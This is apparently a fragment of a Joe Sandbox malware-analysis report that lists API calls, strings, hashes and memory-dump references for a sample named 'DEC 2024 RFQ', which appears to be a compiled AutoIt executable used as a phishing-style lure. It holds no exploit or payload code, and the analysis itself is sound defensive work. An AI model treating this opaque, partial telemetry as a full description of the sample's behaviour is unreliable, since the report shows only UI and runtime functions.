                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 000A8D16
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 000A8D6E
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 000A8E1B
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 000A8E3D
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000A8E87
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000A8EB4
                                                                                                                      • DrawMenuBar.USER32(?), ref: 000A8EC3
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 000A8EEB
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 000A49CA
                                                                                                                      • GetDesktopWindow.USER32 ref: 000A49DF
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000A49E6
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000A4A48
                                                                                                                      • DestroyWindow.USER32(?), ref: 000A4A74
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000A4A9D
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000A4ABB
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 000A4AE1
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 000A4AF6
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 000A4B09
                                                                                                                      • IsWindowVisible.USER32(?), ref: 000A4B29
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 000A4B44
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 000A4B58
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000A4B70
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 000A4B96
                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 000A4BB0
                                                                                                                      • CopyRect.USER32(?,?), ref: 000A4BC7
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 000A4C32
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000228BC
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 000228C4
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000228EF
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 000228F7
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0002291C
                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00022939
                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00022949
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0002297C
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00022990
                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 000229AE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000229CA
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 000229D5
                                                                                                                        • Part of subcall function 00022344: GetCursorPos.USER32(?), ref: 00022357
                                                                                                                        • Part of subcall function 00022344: ScreenToClient.USER32(000E57B0,?), ref: 00022374
                                                                                                                        • Part of subcall function 00022344: GetAsyncKeyState.USER32(00000001), ref: 00022399
                                                                                                                        • Part of subcall function 00022344: GetAsyncKeyState.USER32(00000002), ref: 000223A7
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00021256), ref: 000229FC
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0007A47A
                                                                                                                      • __swprintf.LIBCMT ref: 0007A51B
                                                                                                                      • _wcscmp.LIBCMT ref: 0007A52E
                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0007A583
                                                                                                                      • _wcscmp.LIBCMT ref: 0007A5BF
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0007A5F6
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0007A648
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0007A67E
                                                                                                                      • GetParent.USER32(?), ref: 0007A69C
                                                                                                                      • ScreenToClient.USER32(00000000), ref: 0007A6A3
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0007A71D
                                                                                                                      • _wcscmp.LIBCMT ref: 0007A731
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0007A757
                                                                                                                      • _wcscmp.LIBCMT ref: 0007A76B
                                                                                                                        • Part of subcall function 0004362C: _iswctype.LIBCMT ref: 00043634
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                      • String ID: %s%u
                                                                                                                      • API String ID: 3744389584-679674701
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0007AF18
                                                                                                                      • _wcscmp.LIBCMT ref: 0007AF29
                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0007AF51
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0007AF6E
                                                                                                                      • _wcscmp.LIBCMT ref: 0007AF8C
                                                                                                                      • _wcsstr.LIBCMT ref: 0007AF9D
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0007AFD5
                                                                                                                      • _wcscmp.LIBCMT ref: 0007AFE5
                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0007B00C
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0007B055
                                                                                                                      • _wcscmp.LIBCMT ref: 0007B065
                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0007B08D
                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 0007B0F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                      • Opcode ID: 55ceef73116c0c38f6a3f7380eb51ce25a79df576b8cd80e79b29a5f902bc116
                                                                                                                      • Instruction ID: 49a3cf6dc5bd95fe60a7366b16c83f53916e9b8e314bf471e61a05fee7503a95
                                                                                                                      • Opcode Fuzzy Hash: 55ceef73116c0c38f6a3f7380eb51ce25a79df576b8cd80e79b29a5f902bc116
                                                                                                                      • Instruction Fuzzy Hash: D881C07150830A9FDB15DF50C881FAA7BE8EF85314F44C46AFD898A092DB38DD45CBA5
APIs
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: 9800c7cfa264eab9fe148b432aeb46ae7546b15244e79e01b844f1f5bb519e36
• Instruction ID: 0d69178b3b79836612b192a73ebf3da67c7261d758de9267fe72c24c5f04d0ca
• Opcode Fuzzy Hash: 9800c7cfa264eab9fe148b432aeb46ae7546b15244e79e01b844f1f5bb519e36
• Instruction Fuzzy Hash: 14310430A48319BADA11EA54EE03EEE73A4AF51710F60402AF50D751D2FF656F04C66B
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00095013
• LoadCursorW.USER32(00000000,00007F00), ref: 0009501E
• LoadCursorW.USER32(00000000,00007F03), ref: 00095029
• LoadCursorW.USER32(00000000,00007F8B), ref: 00095034
• LoadCursorW.USER32(00000000,00007F01), ref: 0009503F
• LoadCursorW.USER32(00000000,00007F81), ref: 0009504A
• LoadCursorW.USER32(00000000,00007F88), ref: 00095055
• LoadCursorW.USER32(00000000,00007F80), ref: 00095060
• LoadCursorW.USER32(00000000,00007F86), ref: 0009506B
• LoadCursorW.USER32(00000000,00007F83), ref: 00095076
• LoadCursorW.USER32(00000000,00007F85), ref: 00095081
• LoadCursorW.USER32(00000000,00007F82), ref: 0009508C
• LoadCursorW.USER32(00000000,00007F84), ref: 00095097
• LoadCursorW.USER32(00000000,00007F04), ref: 000950A2
• LoadCursorW.USER32(00000000,00007F02), ref: 000950AD
• LoadCursorW.USER32(00000000,00007F89), ref: 000950B8
• GetCursorInfo.USER32(?), ref: 000950C8
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: d533aa87cae1a618d5af2a965fe9dfc9ec99fe539bf26bcfd7faae3480003b8d
• Instruction ID: 68ceba28db5eea35fdf3fa7d8ebc25dc162e5e8be83c093f5048503a7dc8b3e1
• Opcode Fuzzy Hash: d533aa87cae1a618d5af2a965fe9dfc9ec99fe539bf26bcfd7faae3480003b8d
• Instruction Fuzzy Hash: 433107B1D487196ADF509FB68C899AFBFE8FF04750F50452AE50DE7280DA7865008F91
APIs
• _memset.LIBCMT ref: 000AA259
• DestroyWindow.USER32(?,?), ref: 000AA2D3
  • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000AA34D
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000AA36F
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000AA382
• DestroyWindow.USER32(00000000), ref: 000AA3A4
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00020000,00000000), ref: 000AA3DB
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000AA3F4
• GetDesktopWindow.USER32 ref: 000AA40D
• GetWindowRect.USER32(00000000), ref: 000AA414
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000AA42C
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000AA444
  • Part of subcall function 000225DB: GetWindowLongW.USER32(?,000000EB), ref: 000225EC
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: 6f1cf9e2fd89dec204dadec7ed74c910619d48c1e24ec364c7532c04dc81ef74
• Instruction ID: 0594ab93098a8965e450d6d9e0a5ef179e4a280885bdeb45b0e4f703fbbbfc4f
• Opcode Fuzzy Hash: 6f1cf9e2fd89dec204dadec7ed74c910619d48c1e24ec364c7532c04dc81ef74
• Instruction Fuzzy Hash: BD71BF71240645AFE721CF68CC48F6A77E5FB8E704F04492DF9859B2A1D774E902CB52
APIs
  • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
• DragQueryPoint.SHELL32(?,?), ref: 000AC627
  • Part of subcall function 000AAB37: ClientToScreen.USER32(?,?), ref: 000AAB60
  • Part of subcall function 000AAB37: GetWindowRect.USER32(?,?), ref: 000AABD6
  • Part of subcall function 000AAB37: PtInRect.USER32(?,?,000AC014), ref: 000AABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 000AC690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000AC69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000AC6BE
• _wcscat.LIBCMT ref: 000AC6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 000AC705
• SendMessageW.USER32(?,000000B0,?,?), ref: 000AC71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 000AC735
• SendMessageW.USER32(?,000000B1,?,?), ref: 000AC757
• DragFinish.SHELL32(?), ref: 000AC75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000AC851
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: a8cd432b16548785874886670904bb19474d035dede8952943f504586bde2337
• Instruction ID: f80ce648cc2913cfa409e5411b2719112ac6a61f4ce1bc25323238c09e5db7ec
• Opcode Fuzzy Hash: a8cd432b16548785874886670904bb19474d035dede8952943f504586bde2337
• Instruction Fuzzy Hash: 73618E71108301AFD701EFA4DC85DAFBBF8EF89750F04092EF595961A2DB709949CBA2
APIs
• CharUpperBuffW.USER32(?,?), ref: 000A4424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000A446F
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: d2ea11429155d7e81aa78130bd38f30c196fc5d8f75da6495f086d5928c2db4e
• Instruction ID: 41f8aa46736c08f7775484a0182a8b87c95c33fc2a16ba8e3a7492ebc6350c28
• Opcode Fuzzy Hash: d2ea11429155d7e81aa78130bd38f30c196fc5d8f75da6495f086d5928c2db4e
• Instruction Fuzzy Hash: A691C0746047119FCB04EF60C451AAEB7E1AF86350F04886DF8966B3A3CB74ED09CB96
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000AB8B4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,000A6B11,?), ref: 000AB910
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000AB949
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 000AB98C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000AB9C3
• FreeLibrary.KERNEL32(?), ref: 000AB9CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000AB9DF
• DestroyIcon.USER32(?), ref: 000AB9EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000ABA0B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000ABA17
  • Part of subcall function 00042EFD: __wcsicmp_l.LIBCMT ref: 00042F86
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: 6d1fdf6eec7bc128a1874e595541c6e4026973da7ac9c37cd0b10c6b0f868930
• Instruction ID: 1fa847888a62aa9d767bb931e2d0f276143e64bb51d6b4a88035d4cd9e93857e
• Opcode Fuzzy Hash: 6d1fdf6eec7bc128a1874e595541c6e4026973da7ac9c37cd0b10c6b0f868930
• Instruction Fuzzy Hash: BC61F071A00619BAEB14DFA4CC41FFE7BACEF0A721F104116FA15D61D2DB789990DBA0
APIs
• GetLocalTime.KERNEL32(?), ref: 0008DCDC
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0008DCEC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0008DCF8
• __wsplitpath.LIBCMT ref: 0008DD56
• _wcscat.LIBCMT ref: 0008DD6E
• _wcscat.LIBCMT ref: 0008DD80
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0008DD95
• SetCurrentDirectoryW.KERNEL32(?), ref: 0008DDA9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0008DDDB
• SetCurrentDirectoryW.KERNEL32(?), ref: 0008DDFC
• _wcscpy.LIBCMT ref: 0008DE08
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0008DE47
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: 7eb133ac86f63e6d8e143b6afd0b2e1a7de1dc0112664921a3175b2415af3145
• Instruction ID: 2a7da156b933d2c1e69907878df2fba99cbad3b77b3a77a611c613713e93dc89
• Opcode Fuzzy Hash: 7eb133ac86f63e6d8e143b6afd0b2e1a7de1dc0112664921a3175b2415af3145
• Instruction Fuzzy Hash: F7616A725043069FCB10EF60D844AAEB3E8FF89310F04492EF999C7292DB35E945CB92
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00089C7F
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00089CA0
• __swprintf.LIBCMT ref: 00089CF9
• __swprintf.LIBCMT ref: 00089D12
• _wprintf.LIBCMT ref: 00089DB9
• _wprintf.LIBCMT ref: 00089DD7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-3080491070
• Opcode ID: df5cf51bf0816ed50ecedc71ea5f5322379f4a0d7ee534780b6a8732a0a8fdad
• Instruction ID: d3486ddd059ebf51118c13e134f68be2961da26d7b1eb8a32c0c6f14dd43e9f1
• Opcode Fuzzy Hash: df5cf51bf0816ed50ecedc71ea5f5322379f4a0d7ee534780b6a8732a0a8fdad
• Instruction Fuzzy Hash: B251917190061AAADF15FBE0DD86EFEB778AF04301F204065B609761A2EF352F58DB64
APIs
  • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
  • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
• CharLowerBuffW.USER32(?,?), ref: 0008A3CB
• GetDriveTypeW.KERNEL32 ref: 0008A418
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0008A460
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0008A497
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0008A4C5
  • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 275f10f4704b4ab945a9a127e802f299c97a6bbc6f7aae8148ea00e6a6e31a13
• Instruction ID: 28e944e6dcbd18d34233ab9863fe6e11f518b3906676b9a330e4c8a401656032
• Opcode Fuzzy Hash: 275f10f4704b4ab945a9a127e802f299c97a6bbc6f7aae8148ea00e6a6e31a13
• Instruction Fuzzy Hash: 92515F711043159FD700EF10D8919AAB3E4FF85718F14886EF89957262DB31ED09CB52
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0005E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0007F8DF
• LoadStringW.USER32(00000000,?,0005E029,00000001), ref: 0007F8E8
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
• GetModuleHandleW.KERNEL32(00000000,000E5310,?,00000FFF,?,?,0005E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0007F90A
• LoadStringW.USER32(00000000,?,0005E029,00000001), ref: 0007F90D
• __swprintf.LIBCMT ref: 0007F95D
• __swprintf.LIBCMT ref: 0007F96E
• _wprintf.LIBCMT ref: 0007FA17
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0007FA2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 984253442-2268648507
• Opcode ID: 15ef6270638478af99c0a12dc04b2b74b0cb975afacd5b1695fe3a838c0370b6
• Instruction ID: d592363bceddab95024dae95ba410d699441ebf99808291febc131c3bd47e6ab
• Opcode Fuzzy Hash: 15ef6270638478af99c0a12dc04b2b74b0cb975afacd5b1695fe3a838c0370b6
• Instruction Fuzzy Hash: E0411D7280421AAACF15FBE0ED86EFE7778AF14301F104065B609B6093EA356F49CB65
APIs
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
